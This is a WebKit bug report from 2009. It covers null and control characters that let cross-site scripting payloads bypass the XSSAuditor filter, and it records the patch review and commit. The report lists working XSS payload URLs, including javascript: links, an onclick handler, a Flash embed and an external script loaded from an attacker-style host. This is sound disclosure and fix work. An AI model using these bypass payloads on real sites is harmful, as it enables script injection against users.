Bug 27151

Summary: [XSSAuditor] JavaScript URLs with null/control characters bypass XSSAuditor
Product: WebKit Reporter: Daniel Bates <dbates>
Component: WebCore Misc.Assignee: Nobody <webkit-unassigned>
Status: RESOLVED FIXED    
Severity: Normal CC: abarth, dbates, sam
Priority: P2    
Version: 528+ (Nightly build)   
Hardware: All   
OS: All   
Attachments:
Description Flags
Patch with tests
abarth: review-
Updated patch with tests. abarth: review+

Daniel Bates
Reported 2009-07-10 11:16:17 PDT
Null/control characters in HTTP GET/POST data can bypass XSSAuditor with respect to JavaScript URLs. Examples: JavaScript URL with Null Character: http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aal%00ert%28/XSS/%29%3EContinue%3C/a%3E JavaScript URL with Control Character: http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aalert%28/XSS%05/%29%3EContinue%3C/a%3E +++ This bug was initially created as a clone of Bug #27071 +++ Null/control characters in HTTP GET/POST data can bypass XSSAuditor with respect to injected plugin-based objects, inline event handlers, and external scripts. Examples: Plugin-Injection: http://good.webblaze.org/dbates/xsstest.php?q=%3Cobject%20classid=%22clsid:d27cdb6e-ae6d-11cf-96b8-444553540000%22%20codebase=%22http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab%22%20id=%22flashMov%22%3E%3Cparam%20name=%22movie%22%20value=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22always%22%20/%3E%3Cembed%20src=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20name=%22flashMov%22%20allowScriptAccess=%22always%22%20type=%22application/x-shockwave-flash%22%20/%3E%3C/object%3E Inline Event Handler: http://good.webblaze.org/dbates/xsstest.php?q=%3Ca%20href=%22about:blank%22%20onclick=%22al%00ert(5)%22%3Ed%3C/a%3E External Scripts: http://good.webblaze.org/dbates/xsstest.php?q=<script src='http://evil.webblaze.org/dbates/xss.js'></script>
Attachments
Patch with tests (10.74 KB, patch)
2009-07-10 11:20 PDT, Daniel Bates 		abarth: review-
DetailsFormatted DiffDiff
Updated patch with tests. (11.84 KB, patch)
2009-07-10 13:35 PDT, Daniel Bates 		abarth: review+
DetailsFormatted DiffDiff
Show Obsolete (1) View All Add attachment proposed patch, testcase, etc.
Daniel Bates
Comment 1 2009-07-10 11:20:23 PDT
Created attachment 32565 [details] Patch with tests
Adam Barth
Comment 2 2009-07-10 13:16:57 PDT
Comment on attachment 32565 [details] Patch with tests This looks good, but can you make the same change to the V8 bindings in WebCore/bindings/v8?
Daniel Bates
Comment 3 2009-07-10 13:35:23 PDT
Created attachment 32573 [details] Updated patch with tests. I made the changes in the V8 bindings, but how do I test it? Also, moved line "const String* savedSourceURL = m_sourceURL;" to its original place in file WebCore/bindings/js/ScriptController.cpp.
Adam Barth
Comment 4 2009-07-10 13:39:27 PDT
Comment on attachment 32573 [details] Updated patch with tests. This looks good. To test the V8 bindings, you need a Chromium build. I'll watch the chromium build bot to make sure it works fine.
Daniel Bates
Comment 5 2009-07-10 13:41:16 PDT
Thanks. (In reply to comment #4) > (From update of attachment 32573 [details]) > This looks good. To test the V8 bindings, you need a Chromium build. I'll > watch the chromium build bot to make sure it works fine.
Adam Barth
Comment 6 2009-07-10 18:32:05 PDT
Sending LayoutTests/ChangeLog Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-control-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-control-char.html Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-null-char-expected.txt Adding LayoutTests/http/tests/security/xssAuditor/javascript-link-null-char.html Adding LayoutTests/http/tests/security/xssAuditor/javascript-link.html Adding LayoutTests/http/tests/security/xssAuditor/resources/echo-intertag-click-and-notify.pl Sending WebCore/ChangeLog Sending WebCore/bindings/js/ScriptController.cpp Sending WebCore/bindings/v8/ScriptController.cpp Sending WebCore/page/XSSAuditor.cpp Sending WebCore/page/XSSAuditor.h Transmitting file data ............. Committed revision 45741. http://trac.webkit.org/changeset/45741
Note You need to log in before you can comment on or make changes to this bug.